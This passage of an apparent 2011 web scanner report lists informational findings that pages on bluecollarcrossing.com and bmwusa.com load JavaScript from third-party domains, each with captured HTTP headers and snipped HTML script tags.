<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.25. http://www.bluecollarcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluecollarcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.bluecollarcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:36 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=phn4e0vehg11att6t127knugu0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:36 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.26. http://www.bmwactivatethefuture.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwactivatethefuture.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://code.jquery.com/jquery-latest.pack.js
http://content.bmwusa.com/microsite/bmwusaresources/javascript/swfobject.js
http://content.bmwusa.com/microsite/bmwusaresources/javascript/t47d_resources.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET / HTTP/1.1
Host: www.bmwactivatethefuture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:52:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://content.bmwusa.com/microsite/bmwusaresources/javascript/swfobject.js"></script>
<script type="text/javascript" src="http://content.bmwusa.com/microsite/bmwusaresources/javascript/t47d_resources.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://code.jquery.com/jquery-latest.pack.js"></script>
...[SNIP]...
</a>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

15.27. http://www.bmwusa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://com-bmwusa.netmng.com/
http://group11.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_541.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:50 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; path=/; HttpOnly
Set-Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; expires=Mon, 21-Jan-3011 19:21:50 GMT; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:50 GMT;path=/
Content-Length: 206230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...
</form>
<script language="javascript" type="text/javascript" defer="defer" src="http://group11.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_541.js"></script>
...[SNIP]...

15.28. http://www.bmwusa.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:18 GMT;path=/
Content-Length: 205829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.29. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:43:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:03:52 GMT;path=/
Content-Length: 202165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.30. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128iconvertible/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:52 GMT;path=/
Content-Length: 213572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.31. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:44:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:04:20 GMT;path=/
Content-Length: 225243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.32. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:43:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:03:02 GMT;path=/
Content-Length: 216182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.33. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:22 GMT;path=/
Content-Length: 201997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.34. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128icoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:21 GMT;path=/
Content-Length: 213283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.35. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:23 GMT;path=/
Content-Length: 200122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.36. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:24 GMT;path=/
Content-Length: 214638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.37. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:34 GMT;path=/
Content-Length: 202358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.38. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135iconvertible/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:46:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:06:27 GMT;path=/
Content-Length: 213670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.39. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:37 GMT;path=/
Content-Length: 225504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.40. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:14 GMT;path=/
Content-Length: 216027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.41. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:26 GMT;path=/
Content-Length: 201997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.42. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135icoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:26 GMT;path=/
Content-Length: 213259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.43. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:33 GMT;path=/
Content-Length: 225720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.44. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:25 GMT;path=/
Content-Length: 214974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.45. http://www.bmwusa.com/standard/content/vehicles/2011/1/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:20 GMT;path=/
Content-Length: 200292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.46. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:38 GMT;path=/
Content-Length: 202520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.47. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328iconvertible/default.aspx

Issue detail

